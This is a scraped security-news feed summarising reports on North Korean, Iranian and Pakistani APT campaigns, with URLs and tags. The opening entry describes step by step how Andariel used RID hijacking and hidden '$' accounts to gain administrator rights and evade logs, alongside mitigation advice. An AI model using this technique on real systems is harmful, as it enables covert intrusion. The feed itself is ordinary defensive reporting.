2025-01-29T21:39:00+00:00 https://www.darkreading.com/cyberattacks-data-breaches/researchers-uncover-lazarus-admin-layer-c2-servers www.secnews.physaphae.fr/article.php?IdArticle=8644483 False Threat APT 38 3.0000000000000000
Techworm - News: Hackers Using RID Hijacking To Create Admin Accounts In Windows
wrote in a blog post published on Thursday. In Windows, a Relative Identifier (RID) is part of a Security Identifier (SID), which uniquely distinguishes each user and group within a domain.
For instance, an administrator account will have a RID value of “500”, “501” for guest accounts, “512” for the domain admins group, and for regular users, the RID will start from the value “of 1000”. In a RID hijacking attack, hackers change the RID of a low-privilege account to the same value as an administrator account. As a result, Windows grants administrative privileges to the account. However, to pull this off, attackers need access to the SAM (Security Account Manager) registry, which requires them to already have SYSTEM-level access to the targeted machine for modification. Attackers typically use tools such as PsExec and JuicyPotato to escalate their privileges and launch a SYSTEM-level command prompt. While SYSTEM access is the highest privilege in Windows, it has certain limitations: it doesn\'t allow remote access, cannot interact with GUI apps, generates noisy activity that can be easily detected and doesn\'t persist after a system reboot. To work around these issues, Andariel first created a hidden, low-privilege local user account by appending a “$” character to its username. This made the account invisible in regular listings but still accessible in the SAM registry. The attackers then carried out RID hijacking to escalate the account’s privileges to the administrator level. According to the researchers, Andariel added the modified account to the Remote Desktop Users and Administrators groups, giving them more control over the system. The group tweaked the SAM registry using custom malware and an open-source tool to execute the RID hijacking. Although SYSTEM access could allow the direct creation of administrator accounts, this method is less conspicuous, making it difficult to detect and prevent. To avoid detection, Andariel also exported and backed up the modified registry settings, deleted the rogue account, and restored it later from the backup when needed, bypassing system logs and making detection even harder. 
To reduce the risk of RID hijacking, system administrators should implement proactive measures such as: Use the Local Security Authority (LSA) Subsystem Service to monitor unusual login attempts and password changes. Prevent unauthorized access to the SAM registry. Restricting the use of tools like PsExec and JuicyPotato. Disabling guest accounts. Enforcing multi-factor authentication (MFA) for all user accounts, including low-privileged ones.
Cybersecurity researchers at AhnLab have discovered that a North Korean threat group uses malicious files to hijack RIDs and grant admin access to low-privilege Windows accounts. According to ASEC researchers, AhnLab’s security intelligence center, the hacking group behind the attack is the “Andariel” threat group, linked to North Korea’s Lazarus hacker group. “RID Hijacking is ]]>
2025-01-25T20:07:25+00:00 https://www.techworm.net/2025/01/hacker-rid-hijacking-create-admin-accounts-windows.html www.secnews.physaphae.fr/article.php?IdArticle=8642525 False Malware,Tool,Threat APT 38,APT 45 2.0000000000000000
InfoSecurity Mag - InfoSecurity Magazine: Lazarus Group Targets Developers in New Data Theft Campaign
SecurityScorecard identified a new campaign in which the North Korean Lazarus group aims to steal source code, secrets and cryptocurrency wallet keys from developer environments.
2025-01-17T15:30:00+00:00 | https://www.infosecurity-magazine.com/news/lazarus-developers-data-theft/ | www.secnews.physaphae.fr/article.php?IdArticle=8638804 | False | None | APT 38 | 3.0000000000000000

The Hacker News - The Hacker News is a hacking news blog (surprising, right?): Lazarus Group Targets Web3 Developers with Fake LinkedIn Profiles in Operation 99
The North Korea-linked Lazarus Group has been attributed to a new cyber attack campaign dubbed Operation 99 that targeted software developers looking for freelance Web3 and cryptocurrency work to deliver malware. "The campaign begins with fake recruiters, posing on platforms like LinkedIn, luring developers with project tests and code reviews," Ryan Sherstobitoff, senior vice president of Threat…
2025-01-15T21:07:00+00:00 | https://thehackernews.com/2025/01/lazarus-group-targets-web3-developers.html | www.secnews.physaphae.fr/article.php?IdArticle=8637830 | False | Malware,Threat | APT 38 | 2.0000000000000000

Dark Reading - Informationweek Branch: North Korea's Lazarus APT Evolves Developer-Recruitment Attacks
"Operation 99" uses job postings to lure freelance software developers into downloading malicious Git repositories. From there, malware infiltrates developer projects to steal source code, secrets, and cryptocurrency.
2025-01-15T16:02:08+00:00 | https://www.darkreading.com/threat-intelligence/north-korea-lazarus-apt-developer-recruitment-attacks | www.secnews.physaphae.fr/article.php?IdArticle=8637791 | False | Malware | APT 38 | 2.0000000000000000

Recorded Future - Recorded Future feed: US, Japan and S. Korea urge crypto industry to take action against North Korean hackers
The governments said North Korea's notorious Lazarus Group hackers "continue to demonstrate a pattern of malicious behavior in cyberspace by conducting numerous cybercrime campaigns to steal cryptocurrency and targeting exchanges, digital asset custodians, and individual users."
2025-01-15T15:47:12+00:00 | https://therecord.media/us-japan-south-korea-urge-crypto-industry-of-north-korean-hackers | www.secnews.physaphae.fr/article.php?IdArticle=8637788 | False | None | APT 38 | 2.0000000000000000

RiskIQ - cyber risk firms (now Microsoft): Weekly OSINT Highlights, 30 December 2024
Snapshot: Last week's OSINT reporting highlights the persistence and evolution of cyber threats targeting a wide range of sectors, from cryptocurrency exchanges to aerospace and defense industries. The predominant attack vectors include phishing, exploitation of long-standing vulnerabilities, and the use of advanced malware like StealBit, OtterCookie, and VBCloud. Threat actors such as North Korea's Lazarus Group and TraderTraitor, as well as botnets like FICORA and CAPSAICIN, continue to refine their tactics, leveraging…
2024-12-30T12:02:43+00:00 | https://community.riskiq.com/article/2ec56fef | www.secnews.physaphae.fr/article.php?IdArticle=8631656 | False | Ransomware,Malware,Tool,Vulnerability,Threat,Cloud | APT 38 | 2.0000000000000000

The Hacker News - The Hacker News is a hacking news blog (surprising, right?): Iran's Charming Kitten Deploys BellaCPP: A New C++ Variant of BellaCiao Malware
The Iranian nation-state hacking group known as Charming Kitten has been observed deploying a C++ variant of a known malware called BellaCiao. Russian cybersecurity company Kaspersky, which dubbed the new version BellaCPP, said it discovered the artifact as part of a "recent" investigation into a compromised machine in Asia that was also infected with the BellaCiao malware. BellaCiao was first…
2024-12-25T15:54:00+00:00 | https://thehackernews.com/2024/12/irans-charming-kitten-deploys-bellacpp.html | www.secnews.physaphae.fr/article.php?IdArticle=8629826 | False | Malware | APT 35 | 2.0000000000000000

HackRead - Cyber Search: Lazarus Group Targets Nuclear Industry with CookiePlus Malware
Key summary points: Securelist by Kaspersky has published its latest threat intelligence report focused on the activities of…
2024-12-23T20:06:03+00:00 | https://hackread.com/lazarus-group-nuclear-industry-cookieplus-malware/ | www.secnews.physaphae.fr/article.php?IdArticle=8629231 | False | Malware,Threat | APT 38 | 4.0000000000000000

Recorded Future - Recorded Future feed: North Korean hackers spotted using new tools on employees of 'nuclear-related' org
Researchers at Kaspersky said they found the Lazarus Group using "a complex infection chain that included multiple types of malware, such as a downloader, loader, and backdoor, demonstrating the group's evolved delivery and improved persistence methods."
2024-12-23T19:32:18+00:00 | https://therecord.media/lazarus-group-new-tools-kaspersky | www.secnews.physaphae.fr/article.php?IdArticle=8629232 | False | Malware,Tool | APT 38 | 2.0000000000000000

The Hacker News - The Hacker News is a hacking news blog (surprising, right?): Lazarus Group Spotted Targeting Nuclear Engineers with CookiePlus Malware
The Lazarus Group, an infamous threat actor linked to the Democratic People's Republic of Korea (DPRK), has been observed leveraging a "complex infection chain" targeting at least two employees belonging to an unnamed nuclear-related organization within the span of one month in January 2024. The attacks, which culminated in the deployment of a new modular backdoor referred to as CookiePlus, are…
2024-12-20T16:14:00+00:00 | https://thehackernews.com/2024/12/lazarus-group-spotted-targeting-nuclear.html | www.secnews.physaphae.fr/article.php?IdArticle=8627927 | False | Malware,Threat | APT 38 | 4.0000000000000000

Kaspersky - Kaspersky Research blog: Lazarus group evolves its infection chain with old and new malware
Lazarus targets employees of a nuclear-related organization with a bunch of malware, such as MISTPEN, LPEClient, RollMid, CookieTime and a new modular backdoor, CookiePlus.
2024-12-19T10:00:55+00:00 | https://securelist.com/lazarus-new-malware/115059/ | www.secnews.physaphae.fr/article.php?IdArticle=8627438 | False | Malware | APT 38 | 3.0000000000000000

RedTeam PL - DarkTrace: AI based detection: BadWPAD wpad.software case and DNS threat hunting
…https://blog.redteam.pl/2019/05/badwpad-dns-suffix-wpad-wpadblocking-com.html]. WPAD TLDs: first of all we checked the TLD list from IANA [https://data.iana.org/TLD/tlds-alpha-by-domain.txt] for the first level of wpad domains (the post then lists the resolved IP addresses and wpad.<TLD> domains found).
2024-12-01T15:56:58+00:00 | https://blog.redteam.pl/2019/05/wpad-software-case-dns-threat-hunting.html | www.secnews.physaphae.fr/article.php?IdArticle=8618460 | False | Malware,Threat | APT 32 | 2.0000000000000000

RiskIQ - cyber risk firms (now Microsoft): Weekly OSINT Highlights, 18 November 2024
2024-11-18T12:22:31+00:00 | https://community.riskiq.com/article/2560112c | www.secnews.physaphae.fr/article.php?IdArticle=8613484 | False | Ransomware,Malware,Tool,Vulnerability,Threat,Prediction,Medical,Cloud,Technical | APT 41,APT 38 | 3.0000000000000000

RiskIQ - cyber risk firms (now Microsoft): Hackers use macOS extended file attributes to hide malicious code
Snapshot: Researchers at Group-IB have ide…
2024-11-15T15:40:32+00:00 | https://community.riskiq.com/article/7c6b391d | www.secnews.physaphae.fr/article.php?IdArticle=8611812 | False | Malware,Threat,Prediction | APT 38 | 2.0000000000000000

The Hacker News - The Hacker News is a hacking news blog (surprising, right?): New RustyAttr Malware Targets macOS Through Extended Attribute Abuse
Threat actors have been found leveraging a new technique that abuses extended attributes for macOS files to smuggle a new malware called RustyAttr. The Singaporean cybersecurity company has attributed the novel activity with moderate confidence to the infamous North Korea-linked Lazarus Group, citing infrastructure and tactical overlaps observed in connection with prior campaigns, including…
2024-11-14T15:21:00+00:00 | https://thehackernews.com/2024/11/new-rustyattr-malware-targets-macos.html | www.secnews.physaphae.fr/article.php?IdArticle=8610957 | False | Malware,Threat | APT 38 | 3.0000000000000000

HackRead - Cyber Search: Lazarus Group Targets macOS with RustyAttr Trojan in Fake Job PDFs
Group-IB has uncovered Lazarus group's stealthy new trojan and technique of hiding malicious code in extended attributes on…
2024-11-14T13:13:41+00:00 | https://hackread.com/lazarus-group-macos-rustyattr-trojan-fake-job-pdfs/ | www.secnews.physaphae.fr/article.php?IdArticle=8611075 | False | None | APT 38 | 3.0000000000000000

InfoSecurity Mag - InfoSecurity Magazine: Lazarus Group Uses Extended Attributes for Code Smuggling in macOS
Lazarus APT has been found smuggling malware onto macOS devices using custom extended attributes, evading detection.
2024-11-13T16:00:00+00:00 | https://www.infosecurity-magazine.com/news/lazarus-extended-attributes-macos/ | www.secnews.physaphae.fr/article.php?IdArticle=8610465 | False | Malware | APT 38 | 2.0000000000000000

RiskIQ - cyber risk firms (now Microsoft): Weekly highlights, 11 November 2024
2024-11-11T12:45:44+00:00 | https://community.riskiq.com/article/3b100c61 | www.secnews.physaphae.fr/article.php?IdArticle=8609345 | False | Ransomware,Malware,Tool,Vulnerability,Threat,Mobile,Cloud | APT 37 | 3.0000000000000000

The Hacker News - The Hacker News is a hacking news blog (surprising, right?): IcePeony and Transparent Tribe Target Indian Entities with Cloud-Based Tools
High-profile entities in India have become the target of malicious campaigns orchestrated by the Pakistan-based Transparent Tribe threat actor and a previously unknown China-nexus cyber espionage group dubbed IcePeony. The intrusions linked to Transparent Tribe involve the use of a malware called ElizaRAT and a new stealer payload dubbed ApoloStealer on specific victims of interest, Check Point…
2024-11-08T17:53:00+00:00 | https://thehackernews.com/2024/11/icepeony-and-transparent-tribe-target.html | www.secnews.physaphae.fr/article.php?IdArticle=8608093 | False | Malware,Tool,Threat | APT 36 | 3.0000000000000000

RiskIQ - cyber risk firms (now Microsoft): Analysis of Cyber Reconnaissance Activities Behind APT37 Threat Actor
2024-11-07T21:47:54+00:00 | https://community.riskiq.com/article/fd1c0c96 | www.secnews.physaphae.fr/article.php?IdArticle=8607767 | False | Malware,Threat,Cloud | APT 37 | 2.0000000000000000

Global Security Mag - French news site: Transparent Tribe (APT36): its new ElizaRAT malware keeps evolving
Category: Malwares
2024-11-05T13:08:28+00:00 | https://www.globalsecuritymag.fr/transparent-tribe-apt36-son-nouveau-malware-elizarat-evolue-encore.html | www.secnews.physaphae.fr/article.php?IdArticle=8606418 | False | Malware | APT 36 | 3.0000000000000000

InfoSecurity Mag - InfoSecurity Magazine: Pakistani Hackers Targeted High-Profile Indian Entities using Custom RAT
APT36 evolved its remote access trojan, ElizaRAT, along with introducing a new stealer payload called ApoloStealer.
2024-11-05T11:30:00+00:00 | https://www.infosecurity-magazine.com/news/pakistan-hackers-high-profile/ | www.secnews.physaphae.fr/article.php?IdArticle=8606395 | False | None | APT 36 | 2.0000000000000000

Dark Reading - Informationweek Branch: APT36 Refines Tools in Attacks on Indian Targets
The Pakistan-based advanced persistent threat actor has been carrying on a cyber-espionage campaign targeting organizations on the subcontinent for more than a decade, and it's now using a new and improved "ElizaRAT" malware.
2024-11-04T22:39:41+00:00 | https://www.darkreading.com/cyberattacks-data-breaches/apt36-refines-tools-attacks-indian-targets | www.secnews.physaphae.fr/article.php?IdArticle=8606147 | False | Malware,Tool,Threat | APT 36 | 3.0000000000000000

RiskIQ - cyber risk firms (now Microsoft): Cloudy With a Chance of RATs: Unveiling APT36 and the Evolution of ElizaRAT
2024-11-04T19:39:03+00:00 | https://community.riskiq.com/article/f01e1d00 | www.secnews.physaphae.fr/article.php?IdArticle=8606105 | False | Ransomware,Malware,Tool,Threat,Mobile,Cloud,Technical | APT 36 | 2.0000000000000000

Checkpoint Research - Security hardware vendor: Cloudy With a Chance of RATs: Unveiling APT36 and the Evolution of ElizaRAT
Introduction: APT36, also known as Transparent Tribe, is a Pakistan-based threat actor notorious for persistently targeting Indian government organizations, diplomatic personnel, and military facilities. APT36 has conducted numerous cyber-espionage campaigns against Windows, Linux, and Android systems. In recent campaigns, APT36 utilized a particularly insidious Windows RAT known as ElizaRAT. First discovered in 2023, ElizaRAT has significantly […]
2024-11-04T13:33:15+00:00 | https://research.checkpoint.com/2024/the-evolution-of-transparent-tribes-new-malware/ | www.secnews.physaphae.fr/article.php?IdArticle=8605953 | False | Threat,Mobile | APT 36 | 2.0000000000000000
Checkpoint - Security hardware vendor: The Evolution of Transparent Tribe's New Malware
Executive Summary: In recent cyber attacks, Transparent Tribe, or APT36, has utilized an increasingly sophisticated malware called ElizaRAT. Check Point Research tracked ElizaRAT's evolution, uncovering its improved execution methods, detection evasion, and Command and Control communication since its public disclosure in September 2023. The ElizaRAT campaigns first executed the same function to verify that the system was set to India Standard Time, indicating that the campaigns targeted Indian systems. Transparent Tribe, otherwise known as APT36, is a Pakistan-affiliated threat actor that notoriously targets Indian-associated entities. The threat group's main objective is cyber espionage, which has previously targeted governmental organizations, diplomatic […]
2024-11-04T13:00:51+00:00 | https://blog.checkpoint.com/research/the-evolution-of-transparent-tribes-new-malware/ | www.secnews.physaphae.fr/article.php?IdArticle=8605928 | False | Malware,Threat | APT 36 | 3.0000000000000000
RiskIQ - cyber risk firms (now Microsoft): Weekly OSINT Highlights, 4 November 2024
2024-11-04T12:25:16+00:00 | https://community.riskiq.com/article/d6da7f0d | www.secnews.physaphae.fr/article.php?IdArticle=8605948 | False | Ransomware,Malware,Tool,Vulnerability,Threat,Mobile,Prediction,Medical,Cloud,Technical | APT 41,APT 28,APT 31,Guam | 3.0000000000000000

RiskIQ - cyber risk firms (now Microsoft): Pacific Rim timeline: Information for defenders from a braid of interlocking attack campaigns
2024-10-31T20:29:50+00:00 | https://community.riskiq.com/article/798c0fdb | www.secnews.physaphae.fr/article.php?IdArticle=8604363 | False | Malware,Tool,Vulnerability,Threat,Legislation,Cloud | APT 41,APT 31 | 3.0000000000000000

RiskIQ - cyber risk firms (now Microsoft): Rekoobe Backdoor Discovered in Open Directory, Possibly Targeting TradingView Users
2024-10-30T18:25:16+00:00 | https://community.riskiq.com/article/3c757860 | www.secnews.physaphae.fr/article.php?IdArticle=8603864 | True | Ransomware,Malware,Tool,Vulnerability,Threat | APT 31 | 2.0000000000000000

RiskIQ - cyber risk firms (now Microsoft): Weekly OSINT Highlights, 28 October 2024
2024-10-28T11:27:40+00:00 | https://community.riskiq.com/article/fa5a55d5 | www.secnews.physaphae.fr/article.php?IdArticle=8602805 | False | Ransomware,Spam,Malware,Tool,Vulnerability,Threat,Prediction,Medical,Cloud,Technical | APT 38,Guam | 2.0000000000000000

RiskIQ - cyber risk firms (now Microsoft): The Crypto Game of Lazarus APT: Investors vs. Zero-days
2024-10-25T16:11:10+00:00 | https://community.riskiq.com/article/e831e4ae | www.secnews.physaphae.fr/article.php?IdArticle=8601740 | False | Ransomware,Malware,Tool,Vulnerability,Threat | APT 38 | 2.0000000000000000

Global Security Mag - French news site: The Lazarus APT group exploited a zero-day vulnerability in Chrome to steal cryptocurrency
Category: Investigations
2024-10-24T23:33:00+00:00 | https://www.globalsecuritymag.fr/le-groupe-apt-lazarus-a-exploite-une-vulnerabilite-zero-day-dans-chrome-pour.html | www.secnews.physaphae.fr/article.php?IdArticle=8602217 | False | Vulnerability,Threat | APT 38 | 2.0000000000000000

HackRead - Cyber Search: Lazarus Group Exploits Chrome 0-Day for Crypto with Fake NFT Game
North Korean hackers from Lazarus Group exploited a zero-day vulnerability in Google Chrome to target cryptocurrency investors with…
2024-10-24T17:38:25+00:00 | https://hackread.com/north-korean-hackers-crypto-deceptive-game-zero-day-exploit/ | www.secnews.physaphae.fr/article.php?IdArticle=8601586 | False | Vulnerability,Threat | APT 38 | 2.0000000000000000

InfoSecurity Mag - InfoSecurity Magazine: Lazarus Group Exploits Google Chrome Flaw in New Campaign
Lazarus Group exploited a Google Chrome zero-day, infecting systems with Manuscrypt malware.
2024-10-24T16:00:00+00:00 | https://www.infosecurity-magazine.com/news/lazarus-group-exploits-google/ | www.secnews.physaphae.fr/article.php?IdArticle=8601571 | False | Malware,Vulnerability,Threat | APT 38 | 2.0000000000000000

The Hacker News - The Hacker News is a hacking news blog (surprising, right?): Lazarus Group Exploits Google Chrome Vulnerability to Control Infected Devices
The North Korean threat actor known as Lazarus Group has been attributed to the zero-day exploitation of a now-patched security flaw in Google Chrome to seize control of infected devices. Cybersecurity vendor Kaspersky said it discovered a novel attack chain in May 2024 that targeted the personal computer of an unnamed Russian national with the Manuscrypt backdoor. This entails triggering the…
2024-10-24T15:23:00+00:00 | https://thehackernews.com/2024/10/lazarus-group-exploits-google-chrome.html | www.secnews.physaphae.fr/article.php?IdArticle=8601531 | False | Vulnerability,Threat | APT 38 | 2.0000000000000000

SecurityWeek - Security News: North Korean Hackers Exploited Chrome Zero-Day for Cryptocurrency Theft
The Lazarus APT created a deceptive website that exploited a Chrome zero-day to install malware and steal cryptocurrency.
2024-10-24T13:02:10+00:00 | https://www.securityweek.com/north-korean-hackers-exploited-chrome-zero-day-for-cryptocurrency-theft/ | www.secnews.physaphae.fr/article.php?IdArticle=8601542 | False | Malware,Vulnerability,Threat | APT 38 | 2.0000000000000000
Dark Reading - Informationweek Branch: Lazarus Group Exploits Chrome Zero-Day in Latest Campaign
The North Korean actor is going after cryptocurrency investors worldwide, leveraging a genuine-looking game site and AI-generated content and images.
2024-10-23T20:55:13+00:00 | https://www.darkreading.com/cyberattacks-data-breaches/lazarus-group-exploits-chrome-zero-day-campaign | www.secnews.physaphae.fr/article.php?IdArticle=8601480 | False | Vulnerability,Threat | APT 38 | 2.0000000000000000

Kaspersky - Kaspersky Research blog: The Crypto Game of Lazarus APT: Investors vs. Zero-days
Kaspersky GReAT experts break down the new campaign of Lazarus APT, which uses social engineering and exploits a zero-day vulnerability in Google Chrome for financial gain.
2024-10-23T11:00:48+00:00 | https://securelist.com/lazarus-apt-steals-crypto-with-a-tank-game/114282/ | www.secnews.physaphae.fr/article.php?IdArticle=8601458 | False | Vulnerability,Threat | APT 38 | 2.0000000000000000

RiskIQ - cyber risk firms (now Microsoft): Weekly OSINT Highlights, 21 October 2024
2024-10-21T11:41:26+00:00 | https://community.riskiq.com/article/02320e34 | www.secnews.physaphae.fr/article.php?IdArticle=8600983 | False | Ransomware,Malware,Tool,Vulnerability,Threat,Cloud | APT 38,APT 37,APT-C-17 | 2.0000000000000000

Dark Reading - Informationweek Branch: DPRK Uses Microsoft Zero-Day in No-Click Toast Attacks
The "Code-on-Toast" supply chain cyberattacks by APT37 delivered data-stealing malware to users in South Korea who had enabled Toast pop-up ads.
2024-10-21T01:00:00+00:00 | https://www.darkreading.com/vulnerabilities-threats/dprk-microsoft-zero-day-no-click-toast-attacks | www.secnews.physaphae.fr/article.php?IdArticle=8600761 | False | Malware,Vulnerability,Threat | APT 37 | 2.0000000000000000

RiskIQ - cyber risk firms (now Microsoft): New FASTCash malware Linux variant helps steal money from ATMs
2024-10-18T20:59:53+00:00 | https://community.riskiq.com/article/b0437795 | www.secnews.physaphae.fr/article.php?IdArticle=8599903 | False | Malware,Tool | APT 38 | 3.0000000000000000

RiskIQ - cyber risk firms (now Microsoft): Malicious ads exploited Internet Explorer zero day to drop malware
2024-10-18T20:53:46+00:00 | https://community.riskiq.com/article/d11b6766 | www.secnews.physaphae.fr/article.php?IdArticle=8599904 | False | Malware,Vulnerability,Threat | APT 37 | 3.0000000000000000

Dark Reading - Informationweek Branch: Iran's APT34 Abuses MS Exchange to Spy on Gulf Gov'ts
A MOIS-aligned threat group has been using Microsoft Exchange servers to exfiltrate sensitive data from Gulf-state government agencies.
2024-10-17T06:00:00+00:00 | https://www.darkreading.com/cyberattacks-data-breaches/iran-apt34-ms-exchange-spy-gulf-govts | www.secnews.physaphae.fr/article.php?IdArticle=8599077 | False | Threat | APT 34 | 2.0000000000000000

The Hacker News - The Hacker News is a hacking news blog (surprising, right?): North Korean ScarCruft Exploits Windows Zero-Day to Spread RokRAT Malware
The North Korean threat actor known as ScarCruft has been linked to the zero-day exploitation of a now-patched security flaw in Windows to infect devices with malware known as RokRAT. The vulnerability in question is CVE-2024-38178 (CVSS score: 7.5), a memory corruption bug in the Scripting Engine that could result in remote code execution when using the Edge browser in Internet Explorer Mode.
2024-10-16T16:20:00+00:00 | https://thehackernews.com/2024/10/north-korean-scarcruft-exploits-windows.html | www.secnews.physaphae.fr/article.php?IdArticle=8598696 | False | Malware,Vulnerability,Threat | APT 37 | 2.0000000000000000

Bleeping Computer - American magazine: Malicious ads exploited Internet Explorer zero day to drop malware
The North Korean hacking group ScarCruft launched a large-scale attack in May that leveraged an Internet Explorer zero-day flaw to infect targets with the RokRAT malware and exfiltrate data. [...]
2024-10-16T09:59:12+00:00 | https://www.bleepingcomputer.com/news/security/malicious-ads-exploited-internet-explorer-zero-day-to-drop-malware/ | www.secnews.physaphae.fr/article.php?IdArticle=8598745 | False | Malware,Vulnerability,Threat | APT 37 | 2.0000000000000000

RiskIQ - cyber risk firms (now Microsoft): North Korean Actors Target Tech Job Seekers with Cross-Platform Malware
2024-10-15T21:16:48+00:00 | https://community.riskiq.com/article/9ce29d67 | www.secnews.physaphae.fr/article.php?IdArticle=8598422 | False | Malware,Tool,Threat | APT 38 | 3.0000000000000000

IndustrialCyber - cyber risk firms for industrial: Trend Micro reveals Earth Simnavaz APT targets Gulf organizations using Microsoft Exchange server backdoor
New research by Trend Micro disclosed that the Iranian cyber espionage group Earth Simnavaz, also known as APT34...
2024-10-15T15:49:31+00:00 | https://industrialcyber.co/ransomware/trend-micro-reveals-earth-simnavaz-apt-targets-gulf-organizations-using-microsoft-exchange-server-backdoor/ | www.secnews.physaphae.fr/article.php?IdArticle=8598242 | False | Prediction | APT 34 | 2.0000000000000000

SecurityWeek - Security News: Iranian Cyberspies Exploiting Recent Windows Kernel Vulnerability
The Iran-linked APT OilRig has intensified cyber operations against the United Arab Emirates and the broader Gulf region.
2024-10-14T11:20:49+00:00 | https://www.securityweek.com/iranian-cyberspies-exploiting-recent-windows-kernel-vulnerability/ | www.secnews.physaphae.fr/article.php?IdArticle=8597613 | False | Vulnerability | APT 34 | 2.0000000000000000

The Hacker News - The Hacker News is a hacking news blog (surprising, right?): OilRig Exploits Windows Kernel Flaw in Espionage Campaign Targeting UAE and Gulf
The Iranian threat actor known as OilRig has been observed exploiting a now-patched privilege escalation flaw impacting the Windows Kernel as part of a cyber espionage campaign targeting the U.A.E. and the broader Gulf region. "The group utilizes sophisticated tactics that include deploying a backdoor that leverages Microsoft Exchange servers for credentials theft, and exploiting vulnerabilities…
2024-10-13T15:10:00+00:00 | https://thehackernews.com/2024/10/oilrig-exploits-windows-kernel-flaw-in.html | www.secnews.physaphae.fr/article.php?IdArticle=8597073 | False | Vulnerability,Threat | APT 34 | 2.0000000000000000

RiskIQ - cyber risk firms (now Microsoft): Earth Simnavaz (aka APT34) Levies Advanced Cyberattacks Against UAE and Gulf Regions
Targeted geolocations: United Arab Emirates. Snapshot: Researchers at Trend Micro have identif…
2024-10-11T21:41:42+00:00 | https://community.riskiq.com/article/bc0f3dd1 | www.secnews.physaphae.fr/article.php?IdArticle=8596273 | False | Malware,Tool,Vulnerability,Threat,Prediction | APT 34 | 3.0000000000000000

RiskIQ - cyber risk firms (now Microsoft): Weekly OSINT Highlights, 7 October 2024
2024-10-07T16:54:11+00:00 | https://community.riskiq.com/article/33015049 | www.secnews.physaphae.fr/article.php?IdArticle=8593765 | False | Ransomware,Malware,Tool,Vulnerability,Threat,Mobile,Prediction,Cloud | APT 37,APT 45 | 2.0000000000000000

Dark Reading - Informationweek Branch: DPRK's APT37 Targets Cambodia With Khmer, 'VeilShell' Backdoor
It's North Korea versus
Cambodia, with Windows default settings and sheer patience allowing the bad guys to avoid easy detection.]]> 2024-10-04T01:00:00+00:00 https://www.darkreading.com/cyberattacks-data-breaches/dprk-apt37-cambodia-khmer-veilshell-backdoor www.secnews.physaphae.fr/article.php?IdArticle=8591649 False None APT 37 2.0000000000000000 Recorded Future - FLux Recorded Future Corée du Nord \\ 'Sleep enveloppé \\' Campagne de logiciels malveillants ciblant le Cambodge, d'autres nations d'Asie du Sud-Est<br>North Korea \\'Shrouded Sleep\\' malware campaign targeting Cambodia, other Southeast Asian nations Researchers linked the campaign to APT37, a hacking group allegedly housed within North Korea\'s Ministry of State Security.]]> 2024-10-03T20:53:04+00:00 https://therecord.media/north-korea-malware-espionage-cambodia www.secnews.physaphae.fr/article.php?IdArticle=8591527 False Malware APT 37 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) Enveloppe # Sleep: une plongée profonde dans la campagne en cours de la Corée du Nord contre l'Asie du Sud-Est<br>SHROUDED#SLEEP: A Deep Dive into North Korea\\'s Ongoing Campaign Against Southeast Asia 2024-10-03T20:13:46+00:00 https://community.riskiq.com/article/2e62a43c www.secnews.physaphae.fr/article.php?IdArticle=8591525 False Malware,Tool,Vulnerability,Threat,Cloud APT 37 3.0000000000000000